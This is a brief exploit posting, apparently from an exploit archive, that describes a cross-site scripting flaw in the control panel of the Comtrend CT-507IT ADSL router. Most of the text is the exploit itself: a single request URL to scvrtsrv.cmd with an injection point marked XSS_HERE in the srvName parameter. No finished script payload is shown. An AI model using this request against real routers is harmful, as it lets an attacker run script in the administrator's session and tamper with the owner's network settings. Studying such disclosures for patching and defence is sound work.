Comtrend ADSL router version CT-507IT suffers from a cross site scripting vulnerability.
bcbb5b0b0aeae386e658de40089ecb9de21b532e2e719d27b84fd7452dd4a1d6
# Exploit Title: XSS in cpanel of Comtrend ADSL Router
# Date: 23-1-2010
# Author: Yoyahack
# Software: Comtrend
# Version: CT-507IT
/*
XSS in the control panel Comtrend ADSL Router
*/
/*
Autor: Yoyahack
Site: undersecurity.net<http://undersecurity.net>
*/
Exploit:
http://Serve/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1,